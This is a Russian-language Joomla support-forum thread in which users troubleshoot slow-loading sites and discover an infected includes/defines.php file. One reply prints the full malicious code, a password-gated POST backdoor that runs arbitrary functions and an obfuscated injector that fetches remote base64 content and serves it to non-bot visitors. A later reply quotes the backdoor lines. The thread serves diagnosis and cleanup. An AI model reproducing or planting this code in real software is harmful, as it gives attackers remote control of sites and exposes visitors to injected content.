Форум русской поддержки Joomla!® CMS
11.12.2016, 17:55:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Долго грузится сайт

 (Прочитано 825 раз)
0 Пользователей и 1 Гость смотрят эту тему.
gorodok
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 43



« : 03.02.2016, 23:58:16 »

Долго грузится сайт, проблема началась пару дней назад.
Вот что пишет поддержка хостинга:
Показать текстовый блок
помогите пожалуйста
Записан
flyingspook
Профи
********

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #1 : 04.02.2016, 11:05:25 »

Что то делали в последние дни с сайтом?
Посещаемость не выросла?
Что в логах пишется?
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #2 : 04.02.2016, 15:19:45 »

Откройте index.php в корне сайта. В самом начале какие то подозрительные строки есть?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #3 : 04.02.2016, 15:48:30 »

Отключить запись сессий в базу данных, в общих настройках Joomla
Записан
gorodok
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 43



« Ответ #4 : 04.02.2016, 17:46:07 »

Что то делали в последние дни с сайтом?
Посещаемость не выросла?
Что в логах пишется?
Ничего не делал только новости добавлял.
Посещаемость  сейчас еще меньше стала.
записи в логах последние за 2015г
Откройте index.php в корне сайта. В самом начале какие то подозрительные строки есть?
ничего не нашел
Отключить запись сессий в базу данных, в общих настройках Joomla
отключал еще дольше грузится
« Последнее редактирование: 04.02.2016, 17:49:54 от gorodok » Записан
b2z
Support Team
*****

Репутация: +710/-0
Offline Offline

Пол: Мужской
Сообщений: 7538


Разраблю понемногу


« Ответ #5 : 05.02.2016, 11:05:14 »

Включите дебаг и выложите сюда отчёт профилирования (внизу страницы).
Записан
gorodok
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 43



« Ответ #6 : 05.02.2016, 11:50:11 »

Включите дебаг и выложите сюда отчёт профилирования (внизу страницы).
Включил отладку системы посмотрите сайт указан у меня в профиле
Записан
b2z
Support Team
*****

Репутация: +710/-0
Offline Offline

Пол: Мужской
Сообщений: 7538


Разраблю понемногу


« Ответ #7 : 05.02.2016, 13:00:49 »

Ну вот теперь посмотрите - все модули, которые дают красные показатели надо поочерёдно отрубать и смотреть, как это будет влиять на загрузку. И 197 запросов на главной, это конечно много.
Записан
flyingspook
Профи
********

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #8 : 05.02.2016, 20:13:33 »

Скорей всего нагружает mod_news_pro_gk5
вот его запросы самые большие
Код:
195 .Время запроса: 9816.44 ms После последнего запроса: 34.32 ms
SELECT
c.id AS CID

  FROM
urp9y_categories AS c

  LEFT JOIN
urp9y_content AS content

  ON
c.id = content.catid


  WHERE
1=1

  AND ( c.id = 11)

  AND
c.extension = 'com_content'
  AND
c.published = 1
и еще

Код:
196 .Время запроса: 18.54 ms После последнего запроса: 11.81 ms

Записан
gorodok
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 43



« Ответ #9 : 05.02.2016, 21:25:10 »

Модули которые были красным цветом пробовал отключать все разом ничего не поменялось. Кстати  админка тоже грузится долго, может хостинг сменить? Сегодня установил сайт на компе на OpenServer все нормально работает
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #10 : 05.02.2016, 21:31:49 »

Модули которые были красным цветом пробовал отключать все разом ничего не поменялось. Кстати  админка тоже грузится долго, может хостинг сменить? Сегодня установил сайт на компе на OpenServer все нормально работает
Мда, а что за хостер у вас?

Ради эксперимента и только ради него: слейте с хостинга все файлы, слейте базу (сделайте полный бекап). Затем удалите все оттуда - и файлы, и базу. Скачайте отсюда вашу версию Joomla и установите на хостинг. Проверьте, как работает. Если нормально - ищите проблемы в своей сборке, если так же тормозит - ищите хостера.
Записан
gorodok
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 43



« Ответ #11 : 05.02.2016, 21:46:36 »

Если напишу название хостинга не сочтут это здесь за рекламу?
Два месяца я на этом хостинге сайт шуршал, проблемы начались несколько дней назад. даже восстанавливал сайт не помогло
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #12 : 05.02.2016, 22:02:32 »

Если напишу название хостинга не сочтут это здесь за рекламу?
Два месяца я на этом хостинге сайт шуршал, проблемы начались несколько дней назад. даже восстанавливал сайт не помогло
Ну какая реклама с такими то багами )) Пишите, думаю модераторы не осерчают )) И сделайте эксперимент, как я писал, чисто ради интереса. Может хостер и ни при чем, может это у вас сайт в ддос-кластере уже... ))
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #13 : 06.02.2016, 23:42:35 »

Я с той же проблемой. Проблемы начались после обновления. Пару сайтов на отдельном ВДС. Один на хостинге.
Сайты с разными шаблонами и плагинами.
K2, и JBzoo
Странички грузятся по 10 секунд. Это не допустимо же!
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #14 : 07.02.2016, 10:16:59 »

Странички грузятся по 10 секунд. Это не допустимо же!

А сайты покажете?
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #15 : 07.02.2016, 15:05:41 »

А сайты покажете?
В чем проблема нашла.
Взяла откатила до предидущей версии и поэтапно заливала файлы.
Проблема нашлась в файле defines.php  в папке includes .
И так на всех сайтах.
Стали по прежнему летать.
В чем там баг. Я не знаю. Не програмистка. Хотя давно уже пора Azn
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #16 : 07.02.2016, 19:41:37 »

Возможно взломали. Файлы не покажете, те что отличались?
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #17 : 08.02.2016, 01:39:01 »

То что сейчас ниже код. Если поставить свежее обновление (конкретно новый) то начинает тормозить

Код:
<?php
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Global definitions
$parts = explode(DIRECTORY_SEPARATOR, JPATH_BASE);

// Defines.
define('JPATH_ROOT',          implode(DIRECTORY_SEPARATOR, $parts));
define('JPATH_SITE',          JPATH_ROOT);
define('JPATH_CONFIGURATION', JPATH_ROOT);
define('JPATH_ADMINISTRATOR', JPATH_ROOT . DIRECTORY_SEPARATOR . 'administrator');
define('JPATH_LIBRARIES',     JPATH_ROOT . DIRECTORY_SEPARATOR . 'libraries');
define('JPATH_PLUGINS',       JPATH_ROOT . DIRECTORY_SEPARATOR . 'plugins');
define('JPATH_INSTALLATION',  JPATH_ROOT . DIRECTORY_SEPARATOR . 'installation');
define('JPATH_THEMES',        JPATH_BASE . DIRECTORY_SEPARATOR . 'templates');
define('JPATH_CACHE',         JPATH_BASE . DIRECTORY_SEPARATOR . 'cache');
define('JPATH_MANIFESTS',     JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
Записан
voland
Профи
********

Репутация: +488/-86
Online Online

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #18 : 08.02.2016, 04:37:46 »

Что то делали в последние дни с сайтом?
Посещаемость не выросла?
Что в логах пишется?
И никто не ответил
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #19 : 09.02.2016, 13:24:04 »

Возможно взломали. Файлы не покажете, те что отличались?

Вот код. Явно вирусняк:

Код:
<?php
/**
 * @package    Joomla.Site
 *
 * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Global definitions
$parts = explode(DIRECTORY_SEPARATOR, JPATH_BASE);

// Defines.
define('JPATH_ROOT',          implode(DIRECTORY_SEPARATOR, $parts));
define('JPATH_SITE',          JPATH_ROOT);
define('JPATH_CONFIGURATION', JPATH_ROOT);
define('JPATH_ADMINISTRATOR', JPATH_ROOT . DIRECTORY_SEPARATOR . 'administrator');
define('JPATH_LIBRARIES',     JPATH_ROOT . DIRECTORY_SEPARATOR . 'libraries');
define('JPATH_PLUGINS',       JPATH_ROOT . DIRECTORY_SEPARATOR . 'plugins');
define('JPATH_INSTALLATION',  JPATH_ROOT . DIRECTORY_SEPARATOR . 'installation');
define('JPATH_THEMES',        JPATH_BASE . DIRECTORY_SEPARATOR . 'templates');
define('JPATH_CACHE',         JPATH_BASE . DIRECTORY_SEPARATOR . 'cache');
define('JPATH_MANIFESTS',     JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
//istart


function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function request_url_data($url) {

    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI'])? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}
error_reporting(0);
$_passssword = '4a9b9533e5de7821cc23b00e921e079a';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');




if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6)!= '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
//    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
//        $url = base64_decode('a3d3czksLDI2Oy0yMDMtNzUtMDQsYW9sZCw8bG5mZGIldnduXHBsdnFgZj43NTA6Ozk7MjI1Njc5MjoxMg==');
    $url = decrypt_url('a3d3czksLDI2Oy0yMDMtNzUtMDQsYW9sZCw8bG5mZGIldnduXHBsdnFgZj43NTA6Ozk7MjI1Njc5MjoxMg==');
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #20 : 09.02.2016, 13:27:00 »

В чем проблема нашла.
Не нашла. Иначе бы больше такого кода на сайте небыло.

Код
error_reporting(0);
$_passssword = '4a9b9533e5de7821cc23b00e921e079a';
 
$p = $_POST;
 
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '')

Знакомая конструкция... Уже многим глаза и нервы проела...
« Последнее редактирование: 09.02.2016, 13:30:42 от SeBun » Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #21 : 09.02.2016, 15:59:12 »

Менять пароли?
И как она велась в код?
Права 644 ведь
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #22 : 09.02.2016, 16:25:19 »

Менять пароли?
И как она велась в код?
Права 644 ведь
1. Да поменяйте, только смысла в этом немного...
2. Получив доступ к сайту через уязвимости...
3. Права - не панацея. Это  как в Windows, есть у файла права "только для чтения", но даже эти права программы могут игнорировать. Что говорить о человеке, которому понадобилось сделать запись в файл? Он заходит и меняет права. Вот и все. На самом деле это немного не так, зато наглядно и понятно.
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #23 : 09.02.2016, 18:05:29 »

1. Да поменяйте, только смысла в этом немного...
2. Получив доступ к сайту через уязвимости...
3. Права - не панацея. Это  как в Windows, есть у файла права "только для чтения", но даже эти права программы могут игнорировать. Что говорить о человеке, которому понадобилось сделать запись в файл? Он заходит и меняет права. Вот и все. На самом деле это немного не так, зато наглядно и понятно.
Так а ка такое могло произойти?
Шаблоны официальные, Расширения тоже. Обновления сразу же ставим...
Записан
jlend
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Сообщений: 34


« Ответ #24 : 09.02.2016, 22:09:28 »

Обновления сразу же ставим...
Не успели.
Пас подобрали.
и др.
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #25 : 10.02.2016, 01:48:36 »

Шелл может менять права под своим пользователем. Чистить надо все и сайты разделять.
Записан
Vekach
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Женский
Сообщений: 131



« Ответ #26 : 10.02.2016, 11:40:08 »

в j3 вообще должны быть base64_decode ?
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #27 : 10.02.2016, 11:56:40 »

Могут быть. Отчего же нет. В самом дистрибутиве не помню, а в компонентах частенько используется.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2290



« Ответ #28 : 10.02.2016, 12:26:15 »

в j3 вообще должны быть base64_decode ?
Есть в самом дистрибутиве. Не стоит удалять все подряд.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet